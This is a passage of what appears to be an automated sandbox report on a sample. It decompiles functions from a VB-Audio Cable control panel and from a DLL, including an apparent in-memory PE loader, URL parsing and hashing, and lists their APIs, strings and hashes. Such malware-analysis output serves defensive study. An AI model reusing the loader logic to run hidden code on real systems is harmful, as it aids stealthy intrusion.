                                                                                                                                                      														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                      														 *_v76 = _v8 +  *_t121;
                                                                                                                                                      														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
                                                                                                                                                      														_t203 = E1001B300(_t239, _t326, _t327, _a4, _a8, _v84, _v76);
                                                                                                                                                      														_t337 = _t334 + 0x30;
                                                                                                                                                      														if(_t203 != 0) {
                                                                                                                                                      															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
                                                                                                                                                      															_v80 = _t311;
                                                                                                                                                      															if(_t311 == 0) {
                                                                                                                                                      																 *((intOrPtr*)(_v76 + 0x18)) = 1;
                                                                                                                                                      															} else {
                                                                                                                                                      																_t220 = E1001B0C0(_v76, _v80);
                                                                                                                                                      																_t337 = _t337 + 8;
                                                                                                                                                      																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
                                                                                                                                                      															}
                                                                                                                                                      															_t206 = E1001AB60(_v76);
                                                                                                                                                      															_t338 = _t337 + 4;
                                                                                                                                                      															if(_t206 != 0) {
                                                                                                                                                      																_t207 = E1001B490(_v76);
                                                                                                                                                      																_t339 = _t338 + 4;
                                                                                                                                                      																if(_t207 != 0) {
                                                                                                                                                      																	_t209 = E1001AD80(_v76);
                                                                                                                                                      																	_t339 = _t339 + 4;
                                                                                                                                                      																	if(_t209 != 0) {
                                                                                                                                                      																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
                                                                                                                                                      																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
                                                                                                                                                      																			L49:
                                                                                                                                                      																			return _v76;
                                                                                                                                                      																		}
                                                                                                                                                      																		if( *(_v76 + 0x14) == 0) {
                                                                                                                                                      																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
                                                                                                                                                      																			L47:
                                                                                                                                                      																			goto L49;
                                                                                                                                                      																		}
                                                                                                                                                      																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
                                                                                                                                                      																		_v96 = _v100(_v24, 1, 0);
                                                                                                                                                      																		if(_v96 != 0) {
                                                                                                                                                      																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
                                                                                                                                                      																			goto L47;
                                                                                                                                                      																		}
                                                                                                                                                      																		SetLastError(0x45a);
                                                                                                                                                      																		L50:
                                                                                                                                                      																		E1001A960(_v76);
                                                                                                                                                      																		return 0;
                                                                                                                                                      																	}
                                                                                                                                                      																	goto L50;
                                                                                                                                                      																}
                                                                                                                                                      																goto L50;
                                                                                                                                                      															}
                                                                                                                                                      															goto L50;
                                                                                                                                                      														}
                                                                                                                                                      														goto L50;
                                                                                                                                                      													}
                                                                                                                                                      													goto L50;
                                                                                                                                                      												}
                                                                                                                                                      												_a16(_v24, 0, 0x8000, _a32);
                                                                                                                                                      												SetLastError(0xe);
                                                                                                                                                      												return 0;
                                                                                                                                                      											}
                                                                                                                                                      											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
                                                                                                                                                      											_t333 = _t333 + 0x14;
                                                                                                                                                      											_v24 = _t225;
                                                                                                                                                      											if(_v24 != 0) {
                                                                                                                                                      												goto L26;
                                                                                                                                                      											}
                                                                                                                                                      											SetLastError(0xe);
                                                                                                                                                      											return 0;
                                                                                                                                                      										}
                                                                                                                                                      										SetLastError(0xc1);
                                                                                                                                                      										return 0;
                                                                                                                                                      									}
                                                                                                                                                      									SetLastError(0xc1);
                                                                                                                                                      									return 0;
                                                                                                                                                      								}
                                                                                                                                                      								SetLastError(0xc1);
                                                                                                                                                      								return 0;
                                                                                                                                                      							}
                                                                                                                                                      							SetLastError(0xc1);
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      					SetLastError(0xc1);
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				return 0;
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B63E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 1001B645
                                                                                                                                                        • Part of subcall function 1001AE40: SetLastError.KERNEL32(0000000D,?,1001B659,100207E4,00000040), ref: 1001AE4D
                                                                                                                                                      • SetLastError.KERNEL32(000000C1), ref: 1001B67F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                      • API String ID: 1762409328-192647395
                                                                                                                                                      • Opcode ID: b2bd2be9dcdaaa9e1dd356673cdb130947970779371eee44ad3347cb4051ef6d
                                                                                                                                                      • Instruction ID: 948ec142860bc01625bc2ce9e1704a97d6b06a0078abf06e4df2749841334317
                                                                                                                                                      • Opcode Fuzzy Hash: b2bd2be9dcdaaa9e1dd356673cdb130947970779371eee44ad3347cb4051ef6d
                                                                                                                                                      • Instruction Fuzzy Hash: CAE1E5B4E00609DFDB04CF94C885AAEBBB5FF88304F648558E905AF395D774E982CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                      			E00403440(void* __ebx, void* __edx, intOrPtr _a4) {
                                                                                                                                                      				char _v128;
                                                                                                                                                      				struct tagMSG _v156;
                                                                                                                                                      				signed int _t9;
                                                                                                                                                      				int _t16;
                                                                                                                                                      				int _t23;
                                                                                                                                                      				signed int _t25;
                                                                                                                                                      				void* _t32;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      
                                                                                                                                                      				_t32 = __edx;
                                                                                                                                                      				_t9 = CreateMutexA(0, 1, "VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}");
                                                                                                                                                      				_t42 = _t9;
                                                                                                                                                      				if(_t42 != 0) {
                                                                                                                                                      					__eflags = GetLastError() - 0xb7;
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						WaitForSingleObject(_t42, 0xffffffff);
                                                                                                                                                      						E00403540(__eflags, 0x4106a8, _a4);
                                                                                                                                                      						E004036D0(__ebx, _t32,  &_v128, "VB-Audio Virtual Cable Control Panel (Version %s)", "1.0.3.5");
                                                                                                                                                      						E00403340(_a4, 0x402e40, "MyMainAppMenu",  &_v128);
                                                                                                                                                      						_t16 = GetMessageA( &_v156, 0, 0, 0);
                                                                                                                                                      						__eflags = _t16;
                                                                                                                                                      						if(_t16 != 0) {
                                                                                                                                                      							_push(__ebx);
                                                                                                                                                      							do {
                                                                                                                                                      								TranslateMessage( &_v156);
                                                                                                                                                      								DispatchMessageA( &_v156);
                                                                                                                                                      								_t23 = GetMessageA( &_v156, 0, 0, 0);
                                                                                                                                                      								__eflags = _t23;
                                                                                                                                                      							} while (_t23 != 0);
                                                                                                                                                      						}
                                                                                                                                                      						ReleaseMutex(_t42);
                                                                                                                                                      						CloseHandle(_t42);
                                                                                                                                                      						return _v156.wParam;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t25 = ReleaseMutex(_t42) | 0xffffffff;
                                                                                                                                                      						__eflags = _t25;
                                                                                                                                                      						return _t25;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					return _t9 | 0xffffffff;
                                                                                                                                                      				}
                                                                                                                                                      			}












                                                                                                                                                      APIs
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}), ref: 00403450
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00403469
                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 00403477
                                                                                                                                                      Strings
                                                                                                                                                      • MyMainAppMenu, xrefs: 004034BF
                                                                                                                                                      • VB-Audio Virtual Cable Control Panel (Version %s), xrefs: 004034AF
                                                                                                                                                      • VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}, xrefs: 00403447
                                                                                                                                                      • 1.0.3.5, xrefs: 004034A6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Mutex$CreateErrorLastRelease
                                                                                                                                                      • String ID: 1.0.3.5$MyMainAppMenu$VB-Audio Cable -Control Panel- Mutex-{12783DE4-C2B5-4698-9D26-EA7E355B50E9}$VB-Audio Virtual Cable Control Panel (Version %s)
                                                                                                                                                      • API String ID: 1553430826-612237310
                                                                                                                                                      • Opcode ID: 0c2093be51ec6a3dd59bf06eb4acf0b6edaa44eeb9dd057be054cd7b85814052
                                                                                                                                                      • Instruction ID: d4fbd8c6f311102f4b008c834d8ea839e75bef2df17ef2523c369acf2d79b8a2
                                                                                                                                                      • Opcode Fuzzy Hash: 0c2093be51ec6a3dd59bf06eb4acf0b6edaa44eeb9dd057be054cd7b85814052
                                                                                                                                                      • Instruction Fuzzy Hash: 81210731540308BBE220AB74DC45F6B3B5CEB44755F100936BA29B61D1DBB8A50886AE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403340(struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, CHAR* _a16) {
                                                                                                                                                      				struct _WNDCLASSA _v40;
                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                      				struct HINSTANCE__* _t31;
                                                                                                                                                      				struct HWND__* _t32;
                                                                                                                                                      
                                                                                                                                                      				_t31 = _a4;
                                                                                                                                                      				_v40.style = 3;
                                                                                                                                                      				_v40.lpfnWndProc = _a8;
                                                                                                                                                      				_v40.cbClsExtra = 0;
                                                                                                                                                      				_v40.cbWndExtra = 0;
                                                                                                                                                      				_v40.hInstance = _t31;
                                                                                                                                                      				_v40.hIcon = LoadIconA(_t31, 0x64);
                                                                                                                                                      				_v40.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                                                                      				_v40.hbrBackground = 0xc;
                                                                                                                                                      				_v40.lpszMenuName = _a12;
                                                                                                                                                      				_v40.lpszClassName = "VBCABLE0ControlPanel0MainWindow0";
                                                                                                                                                      				if(RegisterClassA( &_v40) != 0) {
                                                                                                                                                      					_t21 = CreateWindowExA(0, "VBCABLE0ControlPanel0MainWindow0", _a16, 0x2cb0000, 0x80000000, 0x80000000, 0x384, 0x12c, 0, 0, _t31, 0);
                                                                                                                                                      					_t32 = _t21;
                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                      						ShowWindow(_t32, 5);
                                                                                                                                                      						UpdateWindow(_t32);
                                                                                                                                                      						return _t32;
                                                                                                                                                      					} else {
                                                                                                                                                      						MessageBoxA(_t21, "Failed to create window...", "Startup Error", 0x30);
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					MessageBoxA(0, "Failed to register window class...", "Startup Error", 0x30);
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LoadMessage$ClassCreateCursorIconRegisterWindow
                                                                                                                                                      • String ID: Failed to create window...$Failed to register window class...$Startup Error$VBCABLE0ControlPanel0MainWindow0
                                                                                                                                                      • API String ID: 2259001068-3365842253
                                                                                                                                                      • Opcode ID: 0c2879e572fcc9e7f8191eb746f43d3c5421fde4c5571bdbc84616ab7fb244cc
                                                                                                                                                      • Instruction ID: 6739fdb3db1c511da3919410641a009b659cdbc5ad3c0998b96c8b0e4b081f06
                                                                                                                                                      • Opcode Fuzzy Hash: 0c2879e572fcc9e7f8191eb746f43d3c5421fde4c5571bdbc84616ab7fb244cc
                                                                                                                                                      • Instruction Fuzzy Hash: C321A130685310BBE3109F649C59F4B7BE4FF88B45F504529FA84BA2D0D3B896048BCE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 30%
                                                                                                                                                      			E00402CC0(struct HWND__* _a4, signed int _a8) {
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				signed int _t20;
                                                                                                                                                      
                                                                                                                                                      				_t20 = _a8 & 0x0000ffff;
                                                                                                                                                      				_t9 = _t20 - 0x5a;
                                                                                                                                                      				if(_t9 > 0x21) {
                                                                                                                                                      					L4:
                                                                                                                                                      					if(_t20 < 0x68 || _t20 > 0x6c) {
                                                                                                                                                      						__eflags = _t20 - 0x64;
                                                                                                                                                      						if(_t20 >= 0x64) {
                                                                                                                                                      							__eflags = _t20 - 0x67;
                                                                                                                                                      							if(_t20 <= 0x67) {
                                                                                                                                                      								_t22 = _t20 + 0xffffff9d << 9;
                                                                                                                                                      								__eflags = _t20 + 0xffffff9d << 9;
                                                                                                                                                      								E00402C60(_t20 + 0xffffff9d << 9, _t22);
                                                                                                                                                      								goto L18;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						return _t9;
                                                                                                                                                      					} else {
                                                                                                                                                      						E00402C60(_t20 + 0xffffff9b << 0xa, _t20 + 0xffffff9b << 0xa);
                                                                                                                                                      						goto L7;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					switch( *((intOrPtr*)(0 +  &M00402DEC))) {
                                                                                                                                                      						case 0:
                                                                                                                                                      							_push(5);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push("http://www.vb-cable.com");
                                                                                                                                                      							_push("open");
                                                                                                                                                      							_push( *0x4106a8);
                                                                                                                                                      							goto L3;
                                                                                                                                                      						case 1:
                                                                                                                                                      							__eax =  *0x4106a8;
                                                                                                                                                      							_push(5);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push("http://www.facebook.com/pages/VB-Audio-Software/396002733802606");
                                                                                                                                                      							_push("open");
                                                                                                                                                      							_push( *0x4106a8);
                                                                                                                                                      							goto L3;
                                                                                                                                                      						case 2:
                                                                                                                                                      							_push(5);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push("http://www.vb-audio.com");
                                                                                                                                                      							_push("open");
                                                                                                                                                      							_push( *0x4106a8);
                                                                                                                                                      							L3:
                                                                                                                                                      							_t9 = ShellExecuteA();
                                                                                                                                                      							goto L4;
                                                                                                                                                      						case 3:
                                                                                                                                                      							_push(0xac44);
                                                                                                                                                      							goto L14;
                                                                                                                                                      						case 4:
                                                                                                                                                      							__eax = E00402C00(__eflags, 0xbb80);
                                                                                                                                                      							L7:
                                                                                                                                                      							return MessageBoxA(_a4, "The change will take effect on next launch...\n\nPlease reboot your computer.\n", "VBCABLE Settings", 0x1030);
                                                                                                                                                      							goto L20;
                                                                                                                                                      						case 5:
                                                                                                                                                      							__eax = E00402C00(__eflags, 0x15888);
                                                                                                                                                      							L18:
                                                                                                                                                      							return MessageBoxA(_a4, "The change will take effect on next launch...\n\nPlease reboot your computer.\n", "VBCABLE Settings", 0x1030);
                                                                                                                                                      						case 6:
                                                                                                                                                      							_push(0x17700);
                                                                                                                                                      							L14:
                                                                                                                                                      							__eax = E00402C00(__eflags);
                                                                                                                                                      							__esp = __esp + 4;
                                                                                                                                                      							return MessageBoxA(_a4, "The change will take effect on next launch...\n\nPlease reboot your computer.\n", "VBCABLE Settings", 0x1030);
                                                                                                                                                      							goto L20;
                                                                                                                                                      						case 7:
                                                                                                                                                      							goto L4;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L20:
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,http://www.vb-cable.com,00000000,00000000,00000005), ref: 00402CF9
                                                                                                                                                      • MessageBoxA.USER32 ref: 00402D34
                                                                                                                                                      • MessageBoxA.USER32 ref: 00402DAD
                                                                                                                                                      • MessageBoxA.USER32 ref: 00402DE2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$ExecuteShell
                                                                                                                                                      • String ID: The change will take effect on next launch...Please reboot your computer.$VBCABLE Settings$http://www.facebook.com/pages/VB-Audio-Software/396002733802606$http://www.vb-audio.com$http://www.vb-cable.com$open
                                                                                                                                                      • API String ID: 2697723495-305876929
                                                                                                                                                      • Opcode ID: 6ca41875a5a5dd64532a189b281f19e1b11d6fbe90ebf9ebfd05a0aeb9f09956
                                                                                                                                                      • Instruction ID: a4b70d8e39191fc549faaf501da86aeb9c8e6f077dca2208f8895d5d0ed58bf7
                                                                                                                                                      • Opcode Fuzzy Hash: 6ca41875a5a5dd64532a189b281f19e1b11d6fbe90ebf9ebfd05a0aeb9f09956
                                                                                                                                                      • Instruction Fuzzy Hash: 90212531B88310BAE5203794AE8FF9E2354AF44B14F21813BFA557A1C2D2FC6C44558E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100211B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				char* _v16;
                                                                                                                                                      				char* _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				char _v28;
                                                                                                                                                      				char _v32;
                                                                                                                                                      				char _v35;
                                                                                                                                                      				char _v39;
                                                                                                                                                      				char _v43;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				void* _t86;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      				intOrPtr _t91;
                                                                                                                                                      				void* _t92;
                                                                                                                                                      				void* _t120;
                                                                                                                                                      				void* _t140;
                                                                                                                                                      				void* _t141;
                                                                                                                                                      				void* _t191;
                                                                                                                                                      				void* _t192;
                                                                                                                                                      				void* _t193;
                                                                                                                                                      				void* _t194;
                                                                                                                                                      				void* _t195;
                                                                                                                                                      				void* _t196;
                                                                                                                                                      
                                                                                                                                                      				_t192 = __esi;
                                                                                                                                                      				_t191 = __edi;
                                                                                                                                                      				_t141 = __ebx;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v20 = "https://";
                                                                                                                                                      				_v16 = "http://";
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_v43 = 0;
                                                                                                                                                      				_v39 = 0;
                                                                                                                                                      				_v35 = 0;
                                                                                                                                                      				_t86 = E10001A50(_a4, _v20);
                                                                                                                                                      				_t194 = _t193 + 8;
                                                                                                                                                      				if(_t86 != 0) {
                                                                                                                                                      					L2:
                                                                                                                                                      					_v8 = _a4;
                                                                                                                                                      					_t88 = E10001A50(_a4, _v20);
                                                                                                                                                      					_t195 = _t194 + 8;
                                                                                                                                                      					if(_t88 == 0) {
                                                                                                                                                      						 *_a8 = 0;
                                                                                                                                                      						_v8 = _v8 + 7;
                                                                                                                                                      						 *_a20 = 0x50;
                                                                                                                                                      					} else {
                                                                                                                                                      						 *_a8 = 1;
                                                                                                                                                      						_v8 = _v8 + 8;
                                                                                                                                                      						 *_a20 = 0x1bb;
                                                                                                                                                      					}
                                                                                                                                                      					_t91 = E10001A50(_v8, "/");
                                                                                                                                                      					_t196 = _t195 + 8;
                                                                                                                                                      					_v28 = _t91;
                                                                                                                                                      					if(_v28 == 0) {
                                                                                                                                                      						_t92 = E1000CAC0(_v8);
                                                                                                                                                      						_t196 = _t196 + 4;
                                                                                                                                                      						_v24 = _t92 + 1;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v24 = _v28 - _v8 + 1;
                                                                                                                                                      					}
                                                                                                                                                      					 *_a12 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                      					E1000CF20(_t191,  *_a12, 0, _v24);
                                                                                                                                                      					E1000D190(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
                                                                                                                                                      					_v28 = E10001A50(_v8, "/");
                                                                                                                                                      					if(_v28 == 0) {
                                                                                                                                                      						_v24 = 2;
                                                                                                                                                      						 *_a24 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                      						E1000CF20(_t191,  *_a24, 0, _v24);
                                                                                                                                                      						E1000E280( *_a24, "/");
                                                                                                                                                      					} else {
                                                                                                                                                      						_v24 = E1000CAC0(_v8) - _v28 - _v8 + 1;
                                                                                                                                                      						 *_a24 = L1000CE56(_t141, _v28 - _v8, _t191, _t192, _v24);
                                                                                                                                                      						E1000CF20(_t191,  *_a24, 0, _v24);
                                                                                                                                                      						E1000E280( *_a24, _v28);
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = E10001A50( *_a12, ":");
                                                                                                                                                      					if(_v8 == 0) {
                                                                                                                                                      						_t181 = _a12;
                                                                                                                                                      						_v24 = E1000CAC0( *_a12) + 1;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v24 = _v8 -  *_a12 + 1;
                                                                                                                                                      						_t120 = E1000CAC0( *_a12);
                                                                                                                                                      						_t181 =  &_v44;
                                                                                                                                                      						E1000D190(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
                                                                                                                                                      						E1000E5E5( &_v44, "%d", _a20);
                                                                                                                                                      					}
                                                                                                                                                      					 *_a16 = L1000CE56(_t141, _t181, _t191, _t192, _v24);
                                                                                                                                                      					E1000CF20(_t191,  *_a16, 0, _v24);
                                                                                                                                                      					E1000D190(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
                                                                                                                                                      					_v32 = 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t140 = E10001A50(_a4, _v16);
                                                                                                                                                      					_t194 = _t194 + 8;
                                                                                                                                                      					if(_t140 != 0) {
                                                                                                                                                      						goto L2;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _v32;
                                                                                                                                                      			}




























                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3056589307-0
                                                                                                                                                      • Opcode ID: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                      • Instruction ID: b73e38e492334931c567e70ec6057ca77ce0bc3bbcd211be2433ac406d63848b
                                                                                                                                                      • Opcode Fuzzy Hash: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                      • Instruction Fuzzy Hash: E3911BB9E00209EFDB00CFA4D991EAFB7B5FF48344F104568F905AB345E635AA14CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E1001A480(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				char _v164;
                                                                                                                                                      				intOrPtr _v168;
                                                                                                                                                      				intOrPtr _v172;
                                                                                                                                                      				intOrPtr _v176;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				void* _t36;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				void* _t80;
                                                                                                                                                      				void* _t81;
                                                                                                                                                      
                                                                                                                                                      				_t74 = __esi;
                                                                                                                                                      				_t73 = __edi;
                                                                                                                                                      				_t57 = __ebx;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v176 = L1000CE56(__ebx, __edx, __edi, __esi, 0x10);
                                                                                                                                                      				_v168 = L1000CE56(__ebx, __edx, __edi, __esi, 0x21);
                                                                                                                                                      				E1000CF20(__edi, _v168, 0, 0x21);
                                                                                                                                                      				E1000CF20(_t73, _v176, 0, 0x10);
                                                                                                                                                      				_t67 = _a4;
                                                                                                                                                      				_t36 = E1000CAC0(_a4);
                                                                                                                                                      				_t80 = _t75 + 0x24;
                                                                                                                                                      				if(_t36 <= 0) {
                                                                                                                                                      					E1000E280(_v168, "00000000000000000000000000000000");
                                                                                                                                                      					_t81 = _t80 + 8;
                                                                                                                                                      				} else {
                                                                                                                                                      					E1001BC10( &_v164);
                                                                                                                                                      					E1001CAC0( &_v164, _a4, E1000CAC0(_a4));
                                                                                                                                                      					_t67 =  &_v164;
                                                                                                                                                      					E1001CBC0( &_v164, _v176);
                                                                                                                                                      					_t81 = _t80 + 0x1c;
                                                                                                                                                      					_v8 = 0;
                                                                                                                                                      					while(_v8 < 0x10) {
                                                                                                                                                      						_t67 = _v168 + _v8 * 2;
                                                                                                                                                      						E1000CC93(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
                                                                                                                                                      						_t81 = _t81 + 0xc;
                                                                                                                                                      						_v8 = _v8 + 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_push(_v176);
                                                                                                                                                      				E1000CA30(_t57, _t73, _t74, __eflags);
                                                                                                                                                      				_v172 = L1000CE56(_t57, _t67, _t73, _t74, 0x11);
                                                                                                                                                      				E1000CF20(_t73, _v172, 0, 0x11);
                                                                                                                                                      				__eflags = _v168 + 8;
                                                                                                                                                      				E1000D190(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
                                                                                                                                                      				_push(_v168);
                                                                                                                                                      				E1000CA30(_t57, _t73, _t74, __eflags);
                                                                                                                                                      				return _v172;
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
